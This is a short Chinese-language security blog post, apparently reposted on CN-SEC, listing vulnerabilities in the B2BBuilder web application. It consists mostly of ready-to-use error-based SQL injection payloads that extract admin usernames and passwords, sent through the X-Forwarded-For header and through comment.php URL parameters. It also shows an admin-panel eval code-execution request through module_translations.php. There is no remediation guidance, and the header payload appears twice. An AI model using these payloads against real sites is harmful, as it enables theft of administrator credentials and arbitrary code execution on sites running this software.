B2BBuilder最近漏洞

没穿底裤 2019年12月31日23:18:43评论330 views字数 1160阅读3分52秒阅读模式
摘要

1、B2BBuilder头注入后台任意代码执行构造头部测试:
[php]x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1[/php]

1、B2BBuilder头注入后台任意代码执行

构造头部测试:
[php]x-forwarded-for:' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,password,user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1[/php]

后台任意代码执行
在eval中用;就能分别执行两个命令,访问:
[php]http://www.0day5.com/admin/module_translations.php?mod=;phpinfo()[/php]

2、B2BBuilder 又一注入漏洞
爆账号:
[php]http://www.0day5.com/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(user,0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1[/php]

爆密码:[php]http://www.0day5.com/comment.php?ctype=2&conid=16873 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:18:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   B2BBuilder最近漏洞http://cn-sec.com/archives/75232.html

发表评论

匿名网友 填写信息